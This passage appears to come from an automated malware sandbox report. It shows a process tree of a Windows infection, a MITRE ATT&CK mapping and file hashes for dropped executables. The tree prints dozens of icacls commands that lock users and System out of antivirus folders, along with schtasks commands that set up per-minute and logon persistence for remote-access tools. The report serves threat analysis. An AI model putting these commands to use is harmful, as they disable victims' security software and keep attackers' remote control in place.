        PID:3160
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
        6⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        7⤵
        Modifies file permissions
        
        PID:3760
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
        6⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        7⤵
        Modifies file permissions
        
        PID:3928
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3116
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        6⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3100
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2732
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        6⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3108
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2552
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2644
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2988
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3744
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3736
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4000
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4004
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3644
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3588
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3704
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3576
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3760
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3176
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3708
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3100
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3724
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3108
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2552
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2188
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4000
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3500
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:324
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3548
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3180
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3404
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4072
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3820
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3448
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3696
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3564
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3704
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:2324
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3160
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2564
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3212
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3696
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3700
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        6⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3368
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
        6⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:3556
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3144
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4000

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x58c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3768
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3904
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3916
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:3548

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:3200

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1288993939-336872128878570606126329411932440670-1085913998952607339-1950799573"
1⤵
PID:3672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1957878494-1268571684-1278213641-21107547542126207697662750828156351691368867742"
1⤵
PID:4024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1851834271-1590112117-255045871559484580-7395791568818592-20733332451446838775"
1⤵
PID:4044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "836926320194095308111798617271950718310288025118-711640489-1786356908-1266325209"
1⤵
PID:3344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "76530155-8862014221788014402-6487262781644003700925287312-530708338-1316622303"
1⤵
PID:3168

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16264835421371612248-16352584891889422436201680204612740334981437853742-653976828"
1⤵
PID:632

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1587730454-15082397151278677973-6065698941944157308343046637-1807178340570318908"
1⤵
PID:3204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "202920113699251222254765181943505507260071728-1852579335-676426357-1254424866"
1⤵
PID:3436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1463085611200327842-140058576213705098277879775791768255750866146235983685992"
1⤵
PID:3616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "822759407-629726700794278231886096608-17101965542100987199-1324222074-1067710302"
1⤵
PID:3684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18018931521248858917-673641892-522970677-695901060-9137131095615426151174668800"
1⤵
PID:3968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-870248001422697819657244693-126054248919184146821823981630-1545952140960744660"
1⤵
PID:3084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1549695020340453445-1510491738190832953-751211483-527385627-1871251361644400540"
1⤵
PID:3308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json

Filesize
102B

MD5
7d1d7e1db5d8d862de24415d9ec9aca4

SHA1
f4cdc5511c299005e775dc602e611b9c67a97c78

SHA256
ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda

SHA512
1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\install\del.bat

Filesize
61B

MD5
398a9ce9f398761d4fe45928111a9e18

SHA1
caa84e9626433fec567089a17f9bcca9f8380e62

SHA256
e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

SHA512
45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

Download Submit
C:\ProgramData\install\ink.exe

Filesize
112KB

MD5
ef3839826ed36f3a534d1d099665b909

SHA1
8afbee7836c8faf65da67a9d6dd901d44a8c55ca

SHA256
136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

SHA512
040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\17ouj865.default-release-1736884216977\activity-stream.discovery_stream.json.tmp

Filesize
25KB

MD5
ec0cb44a796329b7277038bebefe0270

SHA1
8f0b9a89911ab9071abb1486aa16f4a16cf5b979

SHA256
a0daacc540b6509e7d838f5d78023954e4193f1a2baa6e127bd48457ed672260

SHA512
716cb492e265fff11ef480ede9ae476d36b932e985e7570f592daaee58382fa5478778b5704f53855b709010d777e7199a54eb198f57d33c4c76dc4a611faeea

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\17ouj865.default-release-1736884216977\jumpListCache\5c948ibHyqNpUhPsIarhLg==.ico

Filesize
25KB

MD5
6b120367fa9e50d6f91f30601ee58bb3

SHA1
9a32726e2496f78ef54f91954836b31b9a0faa50

SHA256
92c62d192e956e966fd01a0c1f721d241b9b6f256b308a2be06187a7b925f9e0

SHA512
